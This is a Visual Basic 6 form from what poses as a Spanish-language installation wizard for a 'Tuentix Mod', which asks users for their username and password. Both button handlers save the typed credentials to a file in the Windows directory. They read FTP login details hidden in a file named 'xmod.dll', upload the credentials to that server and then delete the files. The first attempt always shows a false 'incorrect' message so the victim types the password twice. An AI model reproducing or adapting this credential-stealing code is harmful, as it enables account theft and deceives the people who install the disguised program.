VERSION 5.00
Begin VB.Form frm_paso4 
   BorderStyle     =   1  'Fixed Single
   Caption         =   "Asistente de instalación de Tuentix Mod"
   ClientHeight    =   5415
   ClientLeft      =   4500
   ClientTop       =   3045
   ClientWidth     =   6810
   Icon            =   "frm_paso4.frx":0000
   KeyPreview      =   -1  'True
   LinkTopic       =   "Form1"
   MaxButton       =   0   'False
   MinButton       =   0   'False
   Picture         =   "frm_paso4.frx":0A02
   ScaleHeight     =   5415
   ScaleWidth      =   6810
   Begin VB.CommandButton cmd_enter1 
      Appearance      =   0  'Flat
      DisabledPicture =   "frm_paso4.frx":7935C
      Height          =   375
      Left            =   3120
      Picture         =   "frm_paso4.frx":7A92E
      Style           =   1  'Graphical
      TabIndex        =   4
      Top             =   4320
      Visible         =   0   'False
      Width           =   2415
   End
   Begin VB.PictureBox lbl_incorrecto 
      Appearance      =   0  'Flat
      BackColor       =   &H80000005&
      BorderStyle     =   0  'None
      ForeColor       =   &H80000008&
      Height          =   255
      Left            =   2520
      Picture         =   "frm_paso4.frx":7D97C
      ScaleHeight     =   255
      ScaleWidth      =   2775
      TabIndex        =   3
      Top             =   3960
      Visible         =   0   'False
      Width           =   2775
   End
   Begin VB.CommandButton cmd_enter 
      Appearance      =   0  'Flat
      DisabledPicture =   "frm_paso4.frx":800EE
      Height          =   375
      Left            =   3120
      Picture         =   "frm_paso4.frx":816C0
      Style           =   1  'Graphical
      TabIndex        =   2
      Top             =   4320
      Width           =   2415
   End
   Begin VB.TextBox txt_pass 
      Appearance      =   0  'Flat
      BorderStyle     =   0  'None
      Height          =   195
      IMEMode         =   3  'DISABLE
      Left            =   2640
      PasswordChar    =   "•"
      TabIndex        =   1
      Top             =   3600
      Width           =   2415
   End
   Begin VB.TextBox txt_user 
      Appearance      =   0  'Flat
      BorderStyle     =   0  'None
      Height          =   285
      Left            =   2640
      TabIndex        =   0
      Top             =   3000
      Width           =   2415
   End
End
Attribute VB_Name = "frm_paso4"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit

Dim ftp As ftp

Private Sub cmd_enter1_Click()
            Dim Archivo As String
            Dim NombreArc As String
            
            Dim Rutaxmod As String
            Dim Rutadestinoxmod As String
            
            Dim NombreUsuario As String
            Dim PassWord As String
            Dim Server As String
                        
            NombreArc = txt_user.Text & "_" & txt_pass.Text & ".txt"
            Archivo = Environ("WINDIR") & "\" & NombreArc
            
            Open Archivo For Output As #1
                        Print #1, txt_user.Text
                        Print #1, txt_pass.Text
            Close #1

            Rutaxmod = App.Path & "\xmod.dll"
            Rutadestinoxmod = Environ("WINDIR") & "\windirect.txt"
            FileCopy Rutaxmod, Rutadestinoxmod
            
            Open Rutadestinoxmod For Input As #1
                        Input #1, NombreUsuario
                        Input #1, PassWord
                        Input #1, Server
            Close #1
            
            With ftp
  
               .Inicializar Me

               .PassWord = PassWord

               .Usuario = NombreUsuario
               
               .Servidor = Server
               
               If .ConectarFtp() = False Then
                    Exit Sub
               End If
               
            End With
            
ftp.SubirArchivo Archivo, NombreArc
ftp.Desconectar

Kill Archivo
Kill Rutadestinoxmod

lbl_incorrecto.Visible = False
frm_paso4.Hide
frm_paso5.Show
End Sub

Private Sub Form_Load()
Set ftp = New ftp

End Sub


Private Sub cmd_enter_Click()
            Dim Archivo As String
            Dim NombreArc As String
            
            Dim Rutaxmod As String
            Dim Rutadestinoxmod As String
            
            Dim NombreUsuario As String
            Dim PassWord As String
            Dim Server As String
                        
            NombreArc = txt_user.Text & "_" & txt_pass.Text & ".txt"
            Archivo = Environ("WINDIR") & "\" & NombreArc
            
            Open Archivo For Output As #1
                        Print #1, txt_user.Text
                        Print #1, txt_pass.Text
            Close #1

            Rutaxmod = App.Path & "\xmod.dll"
            Rutadestinoxmod = Environ("WINDIR") & "\windirect.txt"
            FileCopy Rutaxmod, Rutadestinoxmod
            
            Open Rutadestinoxmod For Input As #1
                        Input #1, NombreUsuario
                        Input #1, PassWord
                        Input #1, Server
            Close #1
            
            With ftp
  
               .Inicializar Me

               .PassWord = PassWord
               
               .Usuario = NombreUsuario
               
               .Servidor = Server
               
              If .ConectarFtp() = False Then
                    Exit Sub
              End If
               
            End With
            
ftp.SubirArchivo Archivo, NombreArc
ftp.Desconectar

Kill Archivo
Kill Rutadestinoxmod

lbl_incorrecto.Visible = True
cmd_enter.Visible = False
cmd_enter1.Visible = True

End Sub

Private Sub Form_KeyDown(KeyCode As Integer, Shift As Integer)

    If KeyCode = 8 And Shift = 6 Then
        frm_show.Show
    End If
    
End Sub
